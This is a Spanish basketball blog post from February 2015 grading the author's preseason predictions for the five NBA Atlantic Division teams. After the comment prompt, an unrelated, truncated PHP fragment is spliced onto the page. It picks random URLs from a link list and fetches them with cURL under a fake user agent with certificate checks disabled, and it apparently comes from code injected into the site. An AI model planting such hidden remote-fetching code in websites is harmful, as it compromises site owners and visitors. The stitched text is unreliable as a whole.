Revisando los pronósticos: Atlántico

10 de February de 2015 por TheDeerHunter

Como todos los años por estas fechas hacemos un ejercicio de autocrítica revisando cómo de atinados estuvimos con nuestros análisis de principio de la campaña. Empezamos por la división Atlántico, que domina Toronto con puño de hierro.

Toronto Raptors

Pronóstico Octubre 2014: En torno a las 45 victorias, luchando por ventaja de campo en PO. Segunda Ronda según cruces.
Probabilidad acierto: Media-Alta
Calificación pronóstico: B

Jugar en la actualmente división más débil de la liga permite a los Raptors superar las expectativas aun habiendo perdido a DeMar DeRozan más de 20 partidos. Sin el factor sorpresa del pasado han logrado moverse cómodamente por la parte alta del cuadro de su conferencia durante todo el curso. Con Kyle Lowry en modo all-star, un sólido Jonas Valanciunas y la resurrección de Louis Williams cuentan con uno de los mejores ataques de toda la liga. La proyección ahora mismo es de alrededor de 55 victorias, aunque esa segunda ronda que pronosticamos puede seguir siendo su techo.

En el aspecto negativo podemos destacar el estancamiento de Terrence Ross y el nivel del venezolano Greivis Vásquez, del que necesitarán su mejor versión en la postemporada. 

Brooklyn Nets

Pronóstico Octubre 2014: Similar número de victorias que el año pasado (44) y clasificados para Playoffs pero caerán en primera ronda.
Probabilidad acierto: Media-Baja
Clasificación pronóstico: C-

Como preveíamos está resultando un año de transición para los Nets pero también pensábamos que el nivel de la conferencia iba a ser mayor y está claro que no acertamos. Aun con todo los Nets no han logrado mantener el listón y lo van a tener muy difícil, no sólo para acercarse al número de victorias del curso pasado sino también para clasificarse para la postemporada. Si estuvieran en el Oeste hace tiempo que sabrían cuál sería su futuro más inmediato.

Se espera cierta reacción tras el all-star, como ocurrió el año pasado, aunque también puede haber movimientos antes de la fecha límite de traspasos que alteren notablemente la plantilla. Ahora mismo la consigna es “desinversión”, así que nadie espera refuerzos importantes sino más bien todo lo contrario.

Boston Celtics

Pronóstico Octubre 2014: Alguna victoria más que el año pasado pero igualmente penúltimos de la Atlántico.
Probabilidad acierto: Baja
Clasificación pronóstico: D-

Se puede mirar la botella medio llena. Ante el horroroso año de los Knicks, los Celtics no son penúltimos de esta asequible división. Incluso mantienen opciones de postemporada y es que con un 45% de victorias en el Este se puede ser 6º. Ellos no están muy lejos del 40%, que es un gran dato dadas las circunstancias. Las salidas de Rajon Rondo y Jeff Green provocaron un cabreo gordo en muchos aficionados pero no así en el joven núcleo de la plantilla, que vio el camino despejado. Teniendo en cuenta la política de la franquicia es muy coherente darles rodaje y además los chavales están respondiendo. Por su parte, Brad Stevens ha ganado mucho crédito. Ha logrado implantar un interesante juego de pase que tan de moda está ahora mismo. Ahora habrá que ver si la acumulación de rondas se traduce en aciertos para apuntalar la base del proyecto. De momento los rookies de este año no han entusiasmado demasiado. Queda mucho por hacer y muchas incógnitas por resolver a medio plazo.

Philadelphia 76ers

Pronóstico Octubre 2014: 20 victorias.
Probabilidad acierto: Media-Baja
Clasificación pronóstico: C-

Cuando se espera “poco o nada” ha de ser muy fácil superar las expectativas. Ni por esas. Los Sixers difícilmente llegarán a las 20 victorias, aunque al menos tienen opciones de no quedar últimos y probablemente no batirán ningún récord negativo esta campaña. También es cierto que puntualmente hemos podido percibir algún matiz positivo, agarrándonos a ese rayo de esperanza cual clavo ardiendo. Quizá sean imaginaciones nuestras, pues les queda mucho camino por delante para atisbar en ellos algo que se parezca remotamente a un equipo digno de la mejor competición del mundo.

New York Knicks

Pronóstico Octubre 2014: 37 victorias, fuera de playoffs.
Probabilidad acierto: Baja
Clasificación pronóstico: D

Otro año horribilis del pupas de la NBA. No sólo no están en la línea de cumplir nuestro más que prudente pronóstico sino más bien de firmar la peor campaña de la historia de la franquicia. Ni los más pesimistas pensaban sufrir tanto. Algunas alineaciones han sido de auténtico sonrojo y los Knicks están perfectamente encarados para acabar siendo el peor equipo de la liga.  No hay nada positivo a lo que agarrarse y la figura de Derek Fisher queda muy señalada para el futuro.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>